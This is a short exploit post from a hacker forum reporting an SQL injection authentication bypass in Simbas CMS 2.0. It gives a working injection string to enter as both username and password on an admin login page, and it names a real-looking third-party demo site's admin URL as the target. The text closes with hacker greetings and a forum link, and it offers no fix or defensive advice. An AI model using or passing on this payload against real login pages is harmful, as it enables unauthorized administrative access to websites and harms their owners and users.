Simbas CMS version 2.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.
e16cb953dd1bc093276c58b4460cb86cb2151ade7b543564472c3ec1d6bf46e1
-----------------------------------------------------
-----------------------------------------------------
Simbas Content Management System (auth Bypass) Remote Sql Injecion
-----------------------------------------------------
Founder: ThE g0bL!N(Dz)
Home: www.h4ckf0ru.com
Vive Algerie
# demo : http://www.officetoweb.co.uk/demo/index.asp
-----------------------------------------------------------
-----------------------------------------------------------
exploit
-------
http://www.officetoweb.co.uk/demo/admin/default.asp
username: r0' or ' 1=1--
Password: r0' or ' 1=1--
demo:
-----
http://www.officetoweb.co.uk/demo/admin/default.asp
------------------------------------------------------
Mission Completed
------------------------------------------------------
Thanx :
M0nSt3r-Dz - Master_FinaL - Dr-HTmL - Super Cristal- Hcoca_Man - Dreadful
Yassine_Enp- ViRuS_HaCkEr_Dz-Mr.JOoMJOoM-Naili
------------------------------------------------------------------------------------
www.h4ckf0ru.com/vb/
------------------------------------------------------------------------------------